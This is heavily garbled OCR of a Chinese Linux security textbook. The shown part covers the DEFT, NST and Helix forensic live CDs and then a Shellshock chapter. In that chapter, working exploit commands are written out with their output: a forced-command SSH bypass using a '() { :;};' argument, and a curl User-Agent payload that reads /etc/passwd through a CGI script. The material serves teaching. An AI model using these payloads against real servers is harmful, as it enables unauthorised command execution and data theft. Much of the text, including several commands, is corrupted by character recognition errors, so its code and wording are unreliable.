H Preferences b Disks 国 Maltego 
图 File Manager PCManFM 4 TorBrowser 


Run 


2. IB aParted 
G E © Midnight Commander 


mir S, Š MountManager 


12.DEFT 还 包括 密码 恢复 工具 ， 在 子 菜单 “Password recovery” 中 可 找到 这 些 工具 。 


li] Accessories b 
DEFT " *. Analysis b 
Wf Graphics " 国 Antimalware k 
kin ý © Data Recovery + 
— » -& Hashing 4 
if Programming b " imaging j 
2" Service p B Mobile Forensics b 
lll Sound & Video p w Network Forensics d 
El wine p OSINT d 
~ Password recovery 站 国 Cmospwd 
System Tools P = Reporting tools k B Cupp 
(5j Preferences b 5j Disks 图 Fcrackzip 
Dun 5| File Manager PCManFM John the Ripper 
图 GParted Pdfcrack 
© Logout Q Midnight Commander 图 samdump2 


AmO A 5 MountManager "? XHydra 


13. 除 前 面 的 工具 类 型 外 ，DEFT 还 包括 一 些 报 告 工 具 ， 在 创建 报告 时 可 使 用 这 些 工 具 。 


[E Accessories b 
DEFT 司 * Analysis b 
l 国 Antimalware 4 
mE 字 Data Recovery b 
office F - indi í 
ii Programming j|» Imaging , 
7? Service p B Mobile Forensics b 
Ë Sound & Video p uw Network Forensics b 
Bl wine p 9$ OSINT b 
e Password recovery d 
System Tools b @ Grab screenshot 
而 Preferences b Disks Bl KeepNote 
Bun ij File Manager PCManFM * Mobius Forensic 
ES GParted $2 RecordMyDesktop 
© Logout © Midnight Commander @ SciTE Text Editor 
deN Acao A 5 MountManager & VYM -View Your Mind 


14.DEFT 使 用 WINE 在 Linux 中 执行 Windows 工 具 ， 可 以 在 主 菜 单 Wine 下 查找 WINE 的 选项 。 


Accessories 
J, DEFT 

E Graphics 
internet 


i) Programming 
© Service 

— Sound & Video 
国 Browse C: Drive 
ijj Configure Wine 
ig Uninstall wine Software 
Winetricks 


System Tools > 
El Preferences b 


Run 


& Logout 


EOM 059 


原理 解析 


a D P 


可 以 选择 在 本 地 安 六 DEFT， 或 从 live CD 中 直接 局 动 。 局 动 后 ， 从 开始 菜单 选中 DEFT 有 菜单 ， 会 友 现 DEFT 包 谷 了 不 同类 型 的 
大 量 工具 集 。 可 以 使 用 这 些 工 具 进 行 分 析 、 数 据 恢复 、 移 动 设备 取证 、 网 络 取 证 等 。 


WINE 被 DEFT 用 来 在 Linux 下 执行 Windows 工 具 。 


84 NST: 网 络 安全 工具 包 


Linux 有 很 多 主要 用 于 渗透 测试 目的 的 友 行 版 本 ，NST 残 是 其 中 之 一 ,该 工具 包 虽 在 使 用 户 能 在 一 个 平台 上 方便 地 访问 多 个 
开源 网 络 安全 应 用 。 


NST 基 于 Fedora Linux 并 包含 可 供 专业 人 员 及 网 络 管理 员 使 用 的 多 个 工具 。 


可 以 从 NST 官 方 网 站 或 直接 从 下 面 的 链接 中 下 载 NST: 


下 载 完成 后 ， 将 1SO 映 像 文 件 刻录 到 CD/DVD 上 或 创建 可 启动 的 live USB. 


当 用 户 了 解 了 如 何 使 用 NST 系 统 及 其 包含 的 工具 时 ， 使 用 NST 进 行 渗透 测试 残 是 小 菜 一 原 。 


1. 首 先 ， 局 动 运行 NST 系 统 。 可 以 以 live 方 式 运行 NST 或 者 在 系统 上 安 濠 并 运行 NST。 人 在 本 例 中 ， 我 们 选择 以 live 方 式 运 行 
NST, 不 过 用 尸 可 根据 需求 自由 选择 。 启 动 完成 后 ， 将 显示 NST 的 默认 扣 面 ， 如 下 图 所 示 : 


Install NST To Hard 
Drive 


Cam 


"UN 


Set NSI System 
Passwords 


2.NST 自 带 了 Web 形 式 的 用 户 界面 ， 用 户 可 通过 该 界面 控制 NST。 访 问 该 界面 前 需要 为 已 有 的 用 户 账号 设置 口令 ， 单 击 桌面 
上 的 “Set NST System Passwords" 图 标 ， 将 打开 一 个 终端 窗口 供用 户 创建 口令 : 


New NST Password: 
Retype new password: 
Changing password for user root. 


passwd: all authentication tokens 


Successfully 


updated successfully. 


updated password for 'root' in /etc/shadow 


Changing password for user nst. 


passwd: all authentication tokens 


Successfully 
Successfully 
Successfully 
t 

Successfully 
Successfully 
Successfully 
Successfully 
Successfully 
Successfully 
Successfully 
Successfully 
Successfully 


updated successfully. 

'nst' in /etc/shadow 

'root' in /etc/nst/httpd/conf/htuser.nst 
'nagiosadmin' in /etc/nst/httpd/conf/htuser.ns 


for 
for 
for 


updated password 
updated password 
updated password 


updated password 
updated password 


for 'root' in /etc/BackupPC/apache.users 

for 'root' in /etc/webmin/miniserv.users 

Added id dsa.pub to 'authorized keys' file for 'vpn' 

Added id rsa.pub to 'authorized keys' file for 'vpn' 

Updated 'authorized keys' file for 'vpn' 

Set 'authorized keys' file owner and mode 

updated password for 'root' in /root/.ssh 

updated password for 'root' in /root/.vnc/passwd 

updated password for 'root/administrator' in /etc/samba/smbpasswd 


3. 口 令 设置 完毕 后 ， 就 可 以 通过 任 一 种 浏览 器 访问 NST 的 Web 用 户 接 口 。 我 们 可 以 使 用 以 下 地 址 访问 本 地 系 


: http://127.0.0.1:9980/nstwui, 


如 果 在 局 域 网 上 的 其 他 系统 进行 访问 ， 那 么 需要 输入 运行 NST 的 系统 的 IP 地 址 。 


Authentication Required 


i A username and password are being requested by http://127.0.0.1:9980. The site says: 
ET "NST WUI: System Management" 


w 


User Name: 


Password: 


«ok 


ia Cancel 


打开 链接 后 会 提示 输入 用 记名 和 口令 ， 输 入 相应 的 信息 后 ， 单 击 “OK” 按 钮 。 


4. 用 户 将 看 到 NSTWUI 的 登录 页 面 。 在 页 面 的 直上 角 会 显示 当前 运行 NST 系 统 的 详情 ， 


dd mg Oc 


它 的 下 面 是 NST 的 菜单 。 


localhost.localdomain 
127.0.0.1 


页 面 右上 角 会 显示 系统 已 经 运行 多 长 时 间 的 信息 。 


Load: 13.06, 11.81, 7.03 


Up: 0 days, 4:13 


Linux 
Network 


E m 
security Toolkit < 


-- 


5.NST 包 含 了 大 量 工具 ， 其 中 一 个 是 bandwidthd， 该 工具 概述 了 网 络 使 用 情况 。 通 过 菜 


单 “Network 一 Monitors 一 bandwidthd Ul" 打开 bandwidthd 的 管理 界面 。 


security Database A 


vork Interface Bandwidth 


scan Monitor 


ig UI (HTTPS) ` 


| itopry Hosts - Google Maps 
ET : 
Ü JUmies "*l ntopng Management 
o» Vureless T. Mer iesus diari ww v E 
dulcius "A nstgeolocate (NG) Management 


ntop UI (HTTP) ” 


UI provides several uk li us 


Ul provides a web-be 
use of a web browse 


b 


bancdwidthd LI 


ment 


ickage management UA] bandwidthd Management 


6. 单 击 “Start Bandwidthd" 按钮 就 可 以 启动 运行 该 工具 。 


7.NST 的 另 一 个 重要 特点 是 可 使 用 Web 界 面 基于 SSH 执 行 远 程 活 动 。 单 击 “System 一 Control Management 一 Run 
command” 菜 单项 ， 将 显示 如 下 图 所 示 窗 口 ， 在 这 里 可 以 运行 任何 命令 。 


Execute Linux Commands 


[root(012 7.0.0.1 tmp] 
8 .管理 员 可 使 用 Web 界 面 远程 重 局 或 天 闭 服 务 器 。 为 此 ， 执 行 “System 一 Control Management—Reboot" RA, 
9. 单 击 “Proceed to reboot this NST system" 进行 确认 ， 否 则 单 击 “Exit” 取 消 。 


10. 在 下 一 个 文本 确认 界面 中 ， 输 入 图 中 文字 并 单 击 “OK” 按 钮 。 


© Confirm to Reboot this NST system (probe-eno16777736)? 


To confirm please enter the following text: "nesez" 


nesez 


原理 解析 


安装 或 启动 NST 后 ， 第 一 步 要 为 已 有 的 用 户 账号 设置 口令 。 使 用 桌面 上 的 “Set NST System Password" 选项 完成 该 操 
作 。 


口令 设置 完毕 后 ， 我 们 可 在 任 一 浏览 器 上 输入 NST 系 统 的 I|P 地 址 ， 通 过 Web 用 户 界 面 来 访问 NST。 


登录 NSTWUI 用 户 界 面 后 ， 可 以 看 到 大 量 的 网 络 安全 工具 ， 本 书 介绍 了 其 中 的 一 些 工具 ， 如 bandwidthd 和 3sH。 


8.5 Helix 


进行 取证 分 析 时 ， 需 要 以 分 钟 级 的 频率 查看 文件 系统 并 分 析 诸 多 事项 ， 如 程序 执行 、 文 件 下 载 、 文 件 创建 等 。 


在 这 种 情况 下 ， 最 好 在 分 析 一 开始 融 为 要 分 析 的 磁盘 创建 证 据 映 像 。Helix 是 创建 该 类 映像 的 不 二 选择 。 


Helix 是 基于 Linux 的 、 主 要 用 于 取证 调查 及 应 急 响 应 的 live CD 系统 。 


准备 工作 


Helix 有 免费 版 本 和 商用 上 版本。 免费 版 本 可 通过 下 面 链 接 下 载 : 
http://www.e-fense.com/products.php 


下 载 完 成 后 ， 将 ISO 了 映像 文件 刻录 到 CD/VDVD 上 或 创建 可 启动 的 live USB 盘 。 
操作 指南 


演示 Helix 的 使 用 时 ， 可 选择 在 系统 上 安 沪 它 ， 或 直接 在 CD/DVD 或 USB 局 动 盘 上 运行 Helix， 如 下 所 示 : 


1. 本 例 中 ， 我 们 使 用 Helix CD 启动 盘 局 动 系 统 。 在 出 现 的 第 一 个 界面 中 ， 选 择 “Boot into the Helix Live CD”， 和 直接 启动 
Helix。 用 户 若 希望 在 系统 上 安装 Helix， 则 可 以 选择 “Install Helix" , 


FICIX- 


Incident Response, Electronic Discovery, Computer Forensics Live CD 


Boot into the Helis Live CD 
Check CD for detects 
Test memory 
Boot trom tirst hard disk 
Install Heli» 


Press Fd to select alternative start-up and installation modes. 


Fi Help Fe Language F3 Keumap F4 Modes FS Accessibility F6 Other Options 


2. 执 行 应 急 啊 应 时 ， 首 先 应 为 硬盘 或 存储 器 创建 映像 以 备 之 后 的 调查 分 析 。 可 以 使 用 Helix 中 的 Adepto 工 具 ， 对 硬盘 进行 逐 


位 复制 。 


3. 单 击 开 始 菜单 ， 选 择 "Forensics & IR”， 可 友 现 “Adepto” 菜 单 ， 选 择 打 开 该 工具。 


4. 司 动 Adepto 后 ， 将 显示 广 应 用 的 主 界面 。 输 入 用 户 名 或 不 填 ， 然 后 单 击 “Go” 按钮 继续 。 


5. 下 一 界面 将 显示 用 户 期 望 复 制 设备 的 相关 信息 。 从 下 拉 菜 单 中 选中 设备 后 ， 将 显示 该 设备 的 所 有 信息 。 本 例 中 我 们 选择 了 
期 望 复 制 的 USB 设 备 。 


otart | Device Info | Acquire | Restore/Clane | Log ] | 


CD/DVD Henmorny Smart 
Slick Hedia 


Device: [sat | [Rescan Devices] 


Make: SanDisk 


Hodel: [Cruzer Blade 


Serial Number: |4C530001271007108431 
Size: [8003 MB'W(ajUx6f20736b — 

Size (Bytes): |8003256320wa) — 22 
Sectors: [15631380 — 
System Bus: ush@2:2 


6. 单 击 界面 项 部 的 “Acquire” 选 项 卡 ， 该 界面 上 需要 用 户 输 入 源 及 目标 的 信息 。 输 入 完毕 后 ， 按 下 “Start” 按 钮 继续 : 


otat | Device Info | &cquire | Restare/C lone | Lag | Chain of Custody 


oaDnurce Information 


Source Device: |sde1 sdci: SanDisk 
: | Hodel: Cruzer Blade 
Image Mame: [sdc1-img.dd 


Size: 8003 HB 
Image Motes: | 


üxbf2073bh 
Destination Information 


Destination: ® Attached ~ Netbios ~ Metcat 


Mount Point: [/media/sdb] UC 


Options 
Type: 4» DCFLDD w~ AFF Hash: MD  .. itd (MB): | +| 
-| Use Advanced Options 


Advanced 
Input B3: 


Seek: | aklp: 


geses Output Bo: 


7. 单 击 “start” 按 钮 后 ， 可 以 在 “start” 按 钮 下 看 到 如 下 图 所 示 的 进度 : 


Started...10:430:44 PM Yerify...10:40:45 PM stopped...10:40:52 PM start...| Stop... 


8. 可 单 击 “Log ”选项 卡 在 日 志 中 得 看 处 理 详情 。 在 日 志 中 ， 可 看 到 USB 设 备 的 哈 硕 值 与 源 映 像 是 匹配 的 。 


Start | Device Info | Acquire | Restore/Clone | Log | Chain af Custody | 


Start DCFLDD Acquisition (W/MD5): Thu Feb 4 22:40:44 UTC 4016 
à MD5 hash will be calculated on /dev/sdcl. 


[:ommand- EE 
dctldd lfs/ PE ir 1p= -[] carnv-znaerro 
np ripe pes stat jiash-mdb 2b% / 
DES a ps depto/bin/progress Z5»? 
o de ey 


"medi a/35 


32140. rec peri 1n 
490«[] recards a 


m 
d: Thu Fe ü 2a- 40:45 UTC 2016 


J 
Command complete 


Y: Thu Feb 4 22:40:48 UTC 2016 


Command-line: def Lar sdbirsdcl-inmg. dd hash=md5 ha: shlog= "tmp 


m oaan y gn 3: | status /usr/local/adepto/bin/progress | 
FUSI | ! dev/null 


一 2 
La 


VERIFY SUCCESSFUL: Hashes match 


9. 下 一 步 是 克隆 用 户 希 望 分 析 的 USB 设 备 。 单 击 “Restore/Clone” 选 项 卡 ， 输 入 源 设备 及 目标 设备 后 ， 单 击 “Clone” 按 
钮 开始 克隆 。 


otart Device Info | Acquire | Restoare/Claone | Lag ] Chain of Custody 


Restore a split Image 


Choose the first image in an Image set {.000): 


Choose the destination device ar file: 


x^ Destination Device: wr Destination File: 


[abd ^ a) OR 


Restore | 


Clone a device 


Choose source and Destination. [Rescan Devices] 


Source Device: Destination Device: 


10. 可 以 在 界面 底部 看 到 进度 。 克 降 过 程 比较 耗 时 ， 时 间 长 短 取 决 于 复制 的 磁盘 大 小 以 及 系统 的 处 理 能 力 。 


| Progress 


11. 克 隆 完 成 后 ， 用 户 可 核查 两 个 设备 中 的 数据 ， 会 友 现 在 第 二 个 USB 设 备 中 克隆 了 一 模 一 样 的 映像 。 


TH) b Os k Computer + TJ(G:) + ` 
Burn New folder Organize ™ Share with ™w Burn New folder 
* Name a$ Favorites * Name 
" Sample Music BE Desktop di Sample Music 
| Sample Pictures J£. Downloads |i Sample Pictures 
™ airtel.pdf 可 | Recent Places 了 airtel.pdf 
E cloud.txt n" owntCloud 5 cloud.txt 
ín] 15027001 -2013- Compliance.xlsx sr] 15027001 -2013- Compliance.xlsx 
=L Payment.pdf 4 3 Libraries 75. Payment.pdf 
D E text.txt b E Documents | |. text.txt 
1 b a Music 3 
b | Pictures 
» BB Videos 


4 jE Computer 
b E Local Disk (C:) 
b cg TJI (D:) 
L3 b (f) DVD RW Drive (E) HP Lasi — 


12.Adepto 提 供 了 一 个 选项 ， 用 于 创建 克隆 过 程 中 所 友 生 事件 的 PDF 报告 。 


单 击 “Chain of Custody" 选项 卡 ， 并 单 击 界面 底部 的 “Create PDF...” 按 钮 开始 创建 报告 。 


otat | Device Info | Acquire | Restore/Clone | Lag | Chain af Custody 


— Chain of Custody Items 


EVIDEHCE CHAIN OF CUSTODY FORM - FOR FORENSIC IMAGE: 
Case Humber: 20163501 


HARD DRIVE/COMPUTER DETAILS 


Manufacturer: SanDisk [Model: Cruzer Blade |Serial: 4653000127100710684331 


IMAGE DETAILS 


Date/Time: ü2704/16 [Created Bu: root [Method: dcfldd | Image: sdcl-imq.dd 


Storage Drive: Segments: 1 


Create PIF... 


原理 解析 


Helix 常 用 于 取证 调查 ， 在 取证 调查 过 程 中 ， 一 个 必要 环 市 就 是 为 要 分 析 的 硬盘 创建 证 据 映 像 。 


通过 使 用 Adepto 工 具 并 按照 前 述 步骤 操作 ， 用 户 了 解 了 创建 USB 设 备 映 像 的 过 程 。 


第 9 章 ”修补 bash 词 洞 


本 章 将 讨论 如 下 主题 : 
. 通过 Shellshock 了 解 bash 漏 洞 


- Shellshock 的 安全 性 问题 


9.1 


. 补丁 管理 系统 


iid Shellshock f bashi] 


Shellshock 或 Bashdoor， 是 大 多 数 版 本 的 Linux 和 UNIX 操 作 系 统 中 存在 的 漏洞 。 访 漏洞 发 现 于 2014 年 9 月 12 日 ， 它 影响 了 


所 有 使 用 bash shell 的 Linux 版 本 。 利 用 Shellshock 漏 洞 ， 可 以 通过 环境 变量 来 远程 执行 命令 。 


准备 工作 


要 了 解 Shellshock， 需 要 一 个 使 用 4.3 之 前 bash 版 本 的 Linux 系 统 ， 这 些 版 本 存在 该 漏洞 。 


操作 指南 


r 


本 节 将 介绍 如 何 设置 系统 ， 以 了 解 shellshock 漏 洞 的 内 部 细节 : 
1. 第 一 步 是 检查 Linux 系 统 上 的 bash 版 本 ， 从 而 确定 系统 是 否 存 在 Shellshock 漏 洞 。 要 检查 bash 的 版 本 ， 运 行 下 述 命令 : 


oot@client:~# bash --version 


GNU bash, version 4.2.25(1)-release (i686-pc-linux-gnu) 


C 


opyright (C) 2011 Free Software Foundation, Inc. 


License GPLv3«: GNU GPL version 3 or later «http: //gnu.org/licenses/gpl.html» 


This is free software; you are free to change and redistribute it. 
There is NO WARRANTY, to the extent permitted by law. 


r 


oot@client:~# i 


已 有 报告 显示 ，4.3 及 之 前 版 本 的 bash 容 易 受 到 Shellshock 漏 洞 的 影响 。 本 例 中 ， 我 们 使 用 的 是 Ubuntu 12.04 LTSsgrühi 


。 从 上 图 所 示 的 输出 可 以 看 出 ， 这 个 系统 存在 安全 隐患 。 


2. 现 在 ,检查 一 下 这 个 漏洞 是 否 真 的 存在 。 为 此 ， 要 运行 以 下 这 段 代码 : 


root@client:~# env x='() { :;}; echo shellshock' bash -c "echo testing" 
shellshock 


testing 
root(üiclient:-£ 


运行 上 述 命令 之 后 ， 如 果 输 出 结果 显示 shellshock， 则 确认 存在 该 漏洞 。 
3. 为 了 理解 这 个 漏洞 ， 首 先 需 要 了 解 bash shell 变 量 的 基础 知识 。 


4. 如 果 要 在 bash 中 创建 一 个 名 为 testvar 的 变量 ， 并 企 其 中 仓储 一 个 shellshock 值 ， 则 需要 运行 这 个 命令 : 


testvar-"shellshock" 


现在 ， 如 果 要 输出 变量 的 值 ， 使 用 echo 命 令 ， 如 下 所 示 : 


echo Stestvar 


5. 通 过 运行 bash 命 令 打 开 一 个 bash 的 子 进程 。 然 后 ， 再 次 尝试 在 子 进程 中 输出 testvar 变 量 的 值 : 


rootf@client:~# testvar-"shellshock" 
root(üclient:- echo Stestvar 
shellshock 

root(üclient:-3 bash 


root(üclient:-3 bash 
root(üclient:-z echo Stestvar 


root@client:~# 


可 以 看 到， 当 我 们 尝试 在 子 进程 中 输出 变量 值 时 ， 得 不 到 任何 输出 结果 ，。 
6. 现 在 ， 使 用 bash 的 环境 变量 来 尝试 重复 上 述 过 程 。 当 启动 一 个 新 的 bash shell 会 话 时 ， 可 以 使 用 一 些 变量 作为 环境 变 


7. 为 了 使 testvar 变 量 成 为 一 个 环境 变量 ， 首 先 需 要 将 它 导出 。 导 出 之 后 ， 束 可 以 在 子 shell 中 调用 这 个 变量 ， 如 下 所 示 : 


root@client:~# export testvar="shellshock" 
root@client:~# echo Stestvar 

shellshock 

root(üclient:-Z£ bash 

root(üclient:-£ echo Stestvar 

shellshock 

root(icclient:-£Z 


8. 同 理 ， 可 以 定义 一 个 国 数 并 导出 这 个 函数 ， 以 便 可 以 在 子 shell 中 使 用 这 个 国 数 。 以 下 步骤 说 明了 如 何 定义 一 个 函数 并 导 


root@client:~# x() { echo 'shellshock';) 
root(üclient:-X x 

shellshock 

root(üclient:-£ export -f x 


root(üclient:-4 bash 
root(üclient:-4 x 
shellshock 


root(client:-£Z 


在 前 面 的 例子 中 ,定义 了 “x” 这 个 遂 数 ， 并 且 使 用 “-f” 标 识 导 出 了 它 。 


9. 现 在 ， 定 义 一 个 新 的 变量 ， 将 它 命名 为 testfunc， 并 给 它 赋 一 个 值 ， 如 下 所 示 : 
testfunc='() { echo 'shellshock';)' 
对 上 述 变量 可 以 像 访 问 常规 变量 一 样 进行 访问 : 
echo $testfunc 
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root(üclient:-4 export testfunc-'() ( echo 'shellshock';)' 
rootüclient:-£ echo Stestfunc 

() ( echo shellshock;) 

root@client:~# testfunc 


testfunc: command not found 
root(üclient:-:3 bash 
root(üclient:-4 testfunc 
shellshock 

root@c lient :-# 


可 见 ， 在 上 述 结果 中 友 生 了 某 种 意外 情况 。 在 父 shell 中 ， 变 量 被 作为 普通 变量 访问 。 然 而 ， 在 子 shell 中 ， 它 被 解释 为 一 个 
ARH HIT TAARIA. 


10. 接 下 来 ， 终 止 该 函数 的 定义 ， 然 后 向 其 友 送 任意 命令 。 


root@client:~# export testfunc-'() { echo 'shellshock';); echo "Vulnerable"' 
rootüclient:-4 bash 
Vulnerable 


root(üclient:-4 testfunc 
shellshock 
root(üclient:-£Z 


在 前 面 的 例子 中 ， 一 旦 启动 一 个 新 的 bash shell， 那 么 当 bash 启 动 时 ， 就 会 执行 在 函数 外 定义 的 代码 ， 在 本 例 中 ， 就 是 


echo'Vulnerable", 


jxLxEbash shell 中 的 漏洞 。 


原理 解析 


首先 需要 检查 在 系统 上 运行 的 bash 和 版本。 然后 运行 一 个 大 家 熟知 的 代码 来 确认 是 否 存在 Shellshock 漏 洞 。 


要 了 解 Shellshock 漏 洞 的 工作 原理 ， 需 要 在 bash 中 创建 一 个 变量 ,然后 尝试 将 其 导出 到 子 shell 并 在 其 中 执行 。 接 下 来 , 需 
要 尝试 创建 男 一 个 变量 并 将 其 值 设 置 为 ”() {echo"shellshock"; }。 完 成 以 上 步骤 之 后 ， 当 这 个 变量 导出 到 子 shell 并 在 其 中 执 
行 时， 我们 看 到 它 被 解读 为 子 shell 的 一 个 函数 并 执行 其 函数 体 。 


这 就 是 为 什么 说 bash 和 存在 Shellshock 漏 洞 的 原因 ， 因 为 通过 特别 定制 的 变量 ， 可 以 在 局 动 bash 后 执行 任意 命令 。 


9.2 Shellshock 的 安全 性 问题 


当今 时 代 ， 几 乎 一 切 都 是 可 以 联网 的 ， 所 以 网 络 安全 是 一 个 需要 重点 关注 的 问题 。 现 在 有 很 多 Web 服 务 器 、 联 网 设备 和 服 
务 都 使 用 Linux 作 为 它们 的 操作 平台 。 大 多 数 版 本 的 Linux 都 使 用 UNIX bash shell， 因 此 shellshock 漏 洞 可 能 会 影响 大 量 的 网 站 
和 Web 服 务 器 。 


在 上 一 节 ， 我 们 了 解 了 shellshock 漏 洞 的 详情 。 现 在 ， 我 们 将 了 解 如 何 通 过 ssH 利 用 这 个 漏洞 实现 攻击 。 
准备 工作 


为 了 利用 这 个 Shellshock 漏 词 ， 需 要 两 个 系统 。 第 一 个 系统 将 作为 目标 机 ， 应 该 存在 Shellshock 漏 洞 。 在 本 例 中 ， 使 用 
Ubuntu 系统 作为 易 受 攻击 的 系统 。 第 二 个 系统 将 作为 攻击 系统 ， 可 以 在 其 上 运行 任何 版 本 的 Linux 系 统 。 在 本 例 中 ， 我 们 将 在 
第 二 个 系统 上 运行 Kali。 


目标 机 将 运行 openssh-server 软 件 包 。 它 可 以 通过 以 下 命令 进行 安装 : 
apt-get install openssh-server 
把 这 个 系统 配置 为 一 个 易 受 攻击 的 SSH 服 务 器 ， 以 显示 Shellshock 漏 洞 是 如 何 被 利用 的 。 


操作 指南 


要 了 解 如 何 利用 Shellshock 漏 洞 攻击 SSH 服 务 器 ， 首 先 需要 将 SSH 服 务 器 配置 为 易 受 攻击 的 系统 。 为 此 ， 按 照 以 下 步骤 操 
fF: 


1. 第 一 步 是 在 SSH 服 务 器 系统 上 添加 一 个 名 为 user1 的 新 用 户 账号 。 并 且 添 加 /home/user1 作 为 其 主 目录 ，/bin/bash 作 为 
其 shell: 


root@client:~# useradd -d /home/user1 -s /bin/bash user1 
root(iclient:-£ 


rootüclient:-£ cat /etc/passwd | grep 'user1' 
:x:1001:1901: : /home/ : /bin/bash 
root(iclient:-£ g 


添加 账号 之 后 ， 通 过 检查 /etc/passwd 文 件 交 叉 验 证 是 否 添加 成 功 。 


2. 接 下 来 ， 需 要 在 /home 中 为 user1 创 建 一 个 目录 ， 并 将 该 目录 的 所 有 权 授 予 user1 账 号 。 


root(üclient:/homes mkdir useri 


root(üclient:/homes chown -R useri /home/user1/ 


3. 现 在 ， 需 要 授权 攻击 者 使 用 认证 密 钥 登 录 SSH 服 务 器 。 为 此 ， 先 使 用 以 下 命令 在 攻击 者 的 系统 上 生成 这 些 授权 密 钥 : 


ssh - paced E 
Generating A Aot 
Enter file in which E Save e key (/root/.ssh/id rsa): 
Enter passphrase (empty i ssphrase): 


Enter same passphrase ag 
Your identification has been saved in /root/.ssh/id rsa. 
Your p ublic ke ey has been saved i /root/.ssh /l10 ELE pub . 


可 以 看 到 ， 公 /私密 钥 已 经 生成 。 


4. 生 成 授权 密 钥 后 ， 通 过 SFTP 将 公 钥 友 送 给 远程 的 SSH 服 务 器 。 首 先 将 id_rsa.pub 公 钥 文 件 复制 到 朱 面 ， 然 后 运行 下 述 命 
令 ， 使 用 SFTP 连 接 到 SSH 服 务 器 。 


~ 


:~# cd Des da! 

Te 
ktop# sftp root192.168.1.101 

root192.168 "n 1Ol's password: 

Connected to 192.168.1.101. 

sftp» put ios sa.pub /root/ 

ruinae ru rsa.pub to /root/id rsa.pub 

id rsa.pub 100% 391 9.4KB/s 00:00 

S Des T] 


连接 成 功 之 后 ， 使 用 put 命 令 传输 文件 。 


5. 在 被 攻击 的 SSH 服 务 器 系统 上 ， 需 要 在 /home/user1/ 中 创建 一 个 .ssh 目 录 ， 然 后 将 id rsa.pub 文 件 的 内 容 写 
入 /home/user1/.ssh/ 目 录 中 的 authorized keys 文 件 : 


root@client:~# mkdir /home/user1/.ssh 


rootüclient:-£ cat id rsa.pub > /home/useri/.ssh/authorized keys 
root(client:-£Z 


6. 之 后 ， 编 辑 SSH 的 配置 文件 etc/ssh/sshd config， 局 用 PublicKeyAuthentication 变 量 ， 并 检查 AuthorizedKeysFile 的 设 
定 是 否 正 确 : 


RSAAuthentication yes 
PubkeyAuthentication yes 


AuthorizedKeysFile Xh/.ssh/authorized keys 
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8. 现 在 ,创建 一 个 基础 脚本 ， 如 果 用 尸 试图 将 date 命 令 作为 参数 传递 ， 该 脚本 将 显示 “restricted” 消 息 。 但 是 ， 如 果 传 递 
除 date 之 外 的 任何 其 他 内 容 ， 则 将 执行 该 脚本 。 我 们 将 这 个 脚本 命名 为 sample.sh， 内 容 如 下 : 


it! /bin/bash 
set $SSH ORIGINAL COMMAND 


if [ $SSH ORIGINAL COMMAND = "date" ] 
echo 'restricted' 


echo "6g" 


9. 创 建 脚本 后 ， 运 行 下 述 命令 为 其 授予 可 执行 权限 : 


chmod +x sample.sh 


10. 之 后 ， 使 用 authorized_keys 文 件 中 的 “command” 选项 ， 通 过 添加 脚本 的 路 径 来 运行 sample.sh 脚 本 ， 如 下 所 示 : 


command-" /home/user1/.ssh/sample.sh" ssh-rsa AAAAB3NzaClyc2EAAAADAQABAAABAQDEvDnN 
OlorytrSm20a8TG1Y7i9mt9x9705GbirdimEAODBey4iEewLicnub7wmLIRZFizaQp9peXTU-750EZJo 
ljdzLgTi1qUb/TYNes7Tvw64D7yWih5U-«6XdXUA jqG/BvAhbaCDk78sw-«tVgfim4TcdzB4vW3NBIOFCRM 


7Te5UHpRr3Q1«-biOkZ2FzuUZYGNbIgjYvKARh jFHVuMscfTOBMrVIy8WorvzAzVTnYu7X9riF jPCaK53x 
D6NzT4ffDCuJKii9AZO4«fO1cd«NjT5HZPvmzGlaó6WmNwe49EG6q6W«- IhwUhNnOCcksCf 1xNgHM-«Tei /g 
ELAR3tlZZiv5ji1TqT rootQkali 


frauthorized Keys 文件 中 进行 上 述 更 改 以 限制 用 户 执行 预定 义 的 一 组 俞 令 ， 这 将 使 公 钥 身 份 验 证 变 得 易 受 攻击 。 


11. 现 在 , 试 着 从 攻击 者 系统 通过 SSH 连 接 目标 机 ， 并 将 date 作 为 参数 进行 传递 。 


itükali:-/Desktop£ ssh userl80192.168.1.101 date 


restricted 
可 以 看 到 显示 了 “restricted ”消息 ， 这 是 因为 我 们 在 authorized keys 文 件 中 添加 了 脚本 的 缘故 。 
12. 接 下 来 ， 尝 试 将 Shellshock 漏 洞 利 用 作为 参数 传递 ， 如 下 所 示 : 


otak :~/Desktop# ssh user18192.168.1.101 '() { :;}; date 
Fri Feo IZ 13:59: 3l ad 


:~/Desktop# 


可 以 看 到 ， 即 使 在 脚本 中 限制 了 date 命 令 ， 但 这 次 它 仍 然 执 行 了 date 命 令 ， 得 到 了 date 命 令 的 输出 结果 。 


利用 Shellshock 漏 洞 还 可 以 攻击 一 个 Apache 服 务 器 ， 将 会 在 该 服务 器 上 运行 上 所 有 人 能够 通过 环境 变量 触 上 友 bash shell 的 脚 
， 攻 击 步 又 如 下 : 


1. 如 果 目 标 机 上 尚未 安装 Apache， 那 么 先 使 用 以 下 命令 安装 Apache: 
apt-get install apache2 


安装 之 后 ， 使 用 以 下 命令 局 动 Apache 服 务 器 : 


service apache2 start 


2. 接 下 来 ， 转 到 /usr/lib/cgi-bin/ 目 录 并 创建 一 个 example.sh 脚 本 ， 其 中 包含 以 下 代码 ， 以 便 显示 一 些 HTML 输 出 : 


it! /bin/bash 
echo 'Content-type:text/html' 
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echo 
echo 'Example Page' 


然后 通过 运行 以 下 命令 使 其 变 为 可 执行 
chmod +x example.sh 


3. 从 攻击 者 系统 中 ， 我 们 尝试 使 用 名 为 curl 的 命令 行 工具 远程 访问 example.sh 文 件 : 


rootaükali:-/Desktop£ curl http://192.168.1.101/cgi-bin/example.sh 
Example Page 


itükali:-/Desktop£ Bi 


由 此 得 到 了 预期 的 脚本 输出 ， 即 Example Page, 


4. 现 在 ， 使 用 curl 向 服务 器 发 送 一 个 恶意 请 求 ， 输 出 目标 机 的 /etc/passwd 文 件 内 容 ， 命 令 如 下 : 


curl -A '() ( :;}; echo "Content-type: text/plain"; echo; /bin/ 
cat /etc/passwd http://192.168.1.104/cgi-bin/example.sh 


root :x:0:0:root:/root : /bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
SyS:x:3:3:sys:/dev:/bin/sh 

sync :x:4:65534:sync :/bin:/bin/sync 
games:x:5:60:games: /usr/games : /bin/sh 
man:x:6:12:man:/var/cache/man: /bin/sh 
Lp:x:/:/:Lp:/var/spool/Lpa:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 

